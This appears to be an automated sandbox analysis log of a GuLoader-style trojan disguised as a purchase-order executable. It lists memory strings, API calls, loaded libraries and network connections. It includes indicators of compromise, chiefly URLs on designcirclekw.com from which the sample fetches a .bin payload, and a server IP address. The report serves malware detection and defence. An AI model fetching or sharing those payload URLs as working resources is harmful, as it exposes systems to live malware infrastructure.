      Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000002.3912621480.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3181377278.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3201010339.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3220354716.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3181585136.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3220645532.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3162090904.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3161939016.00000000075D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://designcirclekw.com/admin/controller/extension/extension/zXcMABFvBCAfEn173.binTf
      Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3249913342.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3249753104.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3269271168.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3028767017.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2970031415.00000000075DC000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3009043227.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3288676137.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3309422923.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3220354716.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3220645532.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3288465328.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3008954123.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2989432317.00000000075DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://designcirclekw.com/admin/controller/extension/extension/zXcMABFvBCAfEn173.bind
      Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3142803072.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3070130873.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3028767017.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3009043227.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3142595518.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3070453625.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3100164919.00000000075DC000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3008954123.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2989432317.00000000075DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://designcirclekw.com/admin/controller/extension/extension/zXcMABFvBCAfEn173.binlIa
      Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3372975726.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3353408541.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3394670154.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3353581442.00000000075DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://designcirclekw.com/dmin/controller/extension/extension/zXcMABFvBCAfEn173.binBFvBCAfEn173.bin
      Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3181377278.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3201010339.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3181585136.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3162090904.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3161939016.00000000075D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://designcirclekw.com/l
      Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3142803072.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000002.3912621480.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3142595518.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3162090904.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3122796477.00000000075DC000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3328739652.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3100164919.00000000075DC000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3328883453.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3161939016.00000000075D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://designcirclekw.com/ler/extension/extension/zXcMABFvBCAfEn173.bin
      Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3142803072.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3181377278.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3142595518.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3201010339.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3220354716.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3181585136.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3220645532.00000000075DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://designcirclekw.com/t
      Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000002.3912621480.0000000007568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://designcirclekw.com/v
      Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000001.2607777042.0000000000649000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
      Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
      Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
      Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
      Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
      Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
      Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
      Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
      Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
      Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
      Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
      Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
      Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
      Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
      Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
      Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
      Source: unknownHTTPS traffic detected: 62.215.181.250:443 -> 192.168.2.8:49976 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 62.215.181.250:443 -> 192.168.2.8:49977 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 62.215.181.250:443 -> 192.168.2.8:49983 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 62.215.181.250:443 -> 192.168.2.8:49984 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 62.215.181.250:443 -> 192.168.2.8:49985 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 62.215.181.250:443 -> 192.168.2.8:49987 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 62.215.181.250:443 -> 192.168.2.8:49990 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 62.215.181.250:443 -> 192.168.2.8:49995 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 62.215.181.250:443 -> 192.168.2.8:49996 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 62.215.181.250:443 -> 192.168.2.8:49997 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 62.215.181.250:443 -> 192.168.2.8:50008 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 62.215.181.250:443 -> 192.168.2.8:50009 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 62.215.181.250:443 -> 192.168.2.8:50010 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 62.215.181.250:443 -> 192.168.2.8:50027 version: TLS 1.2
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeCode function: 0_2_00405063 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405063
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeCode function: 0_2_004030EC EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004030EC
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeCode function: 0_2_004048A20_2_004048A2
      Source: PO-10212024168877 PNG2023-W101.exeStatic PE information: invalid certificate
      Source: PO-10212024168877 PNG2023-W101.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal72.troj.evad.winEXE@3/11@1/1
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeCode function: 0_2_004030EC EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004030EC
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeCode function: 0_2_0040432F GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040432F
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeCode function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar,0_2_0040205E
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeFile created: C:\Users\user\AppData\Local\demarkeredeJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeFile created: C:\Users\user\AppData\Local\Temp\nsp7D8F.tmpJump to behavior
      Source: PO-10212024168877 PNG2023-W101.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: PO-10212024168877 PNG2023-W101.exeReversingLabs: Detection: 52%
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeFile read: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe "C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe"
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeProcess created: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe "C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe"
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeProcess created: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe "C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe"Jump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: PO-10212024168877 PNG2023-W101.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000006.00000002.3906224944.0000000003648000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.2614036861.0000000006688000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeCode function: 0_2_10002D20 push eax; ret 0_2_10002D4E
